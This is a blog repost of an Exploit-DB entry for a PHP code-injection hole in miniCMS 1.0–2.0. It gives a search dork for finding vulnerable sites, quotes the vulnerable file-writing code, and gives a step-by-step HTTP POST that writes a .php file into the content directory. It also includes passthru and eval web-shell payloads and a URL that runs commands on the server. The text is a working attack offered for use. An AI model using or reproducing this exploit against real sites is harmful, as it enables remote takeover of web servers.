[+] Post Title : 
miniCMS v1.0 : v2.0 php inject code [webapps]
[+] Date : Rabu, 01 Februari 2012
[+] Author : Dr. Cruzz
[+] Link : https://xcruzz.blogspot.com/2012/02/minicms-v10-v20-php-inject-code-webapps.html
[+] Type :         
Exploit
EDB-ID: 18410    CVE: N/A    OSVDB-ID: N/A
Author: Or4nG.M4N
########################################################################
| # Title    : miniCMS v1.0 : v2.0 php inject code | 
| # GDork    : "This site is managed using MiniCMS©" | 
| # Download : http://sourceforge.net/projects/mini-cms/files/mini-cms/ | 
| # +----------------------------------+ | 
| # |   xSs m4n   i-Hmx   h311 c0d3    | sp. Cyb3r-Crystal | 
| # |   SarBoT511 ahwak2000 sa^Dev!L   | sp. ahwak2000 | 
| # +----------------------------------+ | 
| #                       php code injection and bypass addslashes(); | 
| # vuln : update.php shell path /content | 
| # vuln : updatenews.php shell path /content/news | 
| $filename = "content/".$pagename.".txt"; <= .php | 
|         if ($file = fopen($filename, "w")) | 
|             //chmod($filename, 0777); | 
|             if($pagename == "sitemap"){ | 
|                 $eachline = split("\n", $postTemp["content"]); | 
|                 foreach($eachline as $el){ | 
|                         $cleancontent .= trim($el) . "\n"; | 
|                 $postTemp["content"] = $cleancontent; | 
|             //$postTemp["content"] = str_replace('"', '\"', $postTemp["content"]); | 
|             if (!get_magic_quotes_gpc()) { | 
|                $postTemp["content"] = addslashes($postTemp["content"]); | 
|             fwrite($file, serialize($postTemp)); | 
|             echo "Unable to open file for writing, please check permissions on content directory"; | 
|         $filename = "content/".$area.".txt"; < = .php | 
|         if ($file = fopen($filename, "w")) | 
|             //$postTemp["content"] = str_replace('"', '\"', $postTemp["content"]); | 
|             fwrite($file, $postTemp["content"]); | 
|  How i can Use this Exploit | 
|  use add on LIVE HTTP HEADER | 
|  in target page [ http://localhost/miniCMS-2.0/index.php?page=1 ] .. | 
|  POST : http://www.cmtsystem.com/mCMS/update.php | 
|  User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 | 
|  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | 
|  Accept-Language: en-us,en;q=0.5 | 
|  Accept-Encoding: gzip, deflate | 
|  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 | 
|  Referer: http://localhost/miniCMS-2.0/index.php?page=1 | 
|  Cookie: miniCMSdemo=32b5075aba3eb6c5d11129ec114346c2 | 
|  Content-Type: application/x-www-form-urlencoded | 
|  Post this shit : title=1&metadata=1&content=[CODE]&page=thnks-ahwak2000-cyber-crystal.php&area=content | 
|  Add Your code php here : [CODE] | 
|  Now how i can bypass addslashes(); inject <?php passthru($_GET[cmd]);?> or <?php eval($_GET[cmd]);?> | 
|  Don't Forget Referer : http://site/index.php?page=1 | 
|  [ ! ] http://site/content/thnks-ahwak2000-cyber-crystal.php?cmd=uname-a | 
|  # Thnks to all Stupid Coder | 
 # The End
 
0 komentar:
Posting Komentar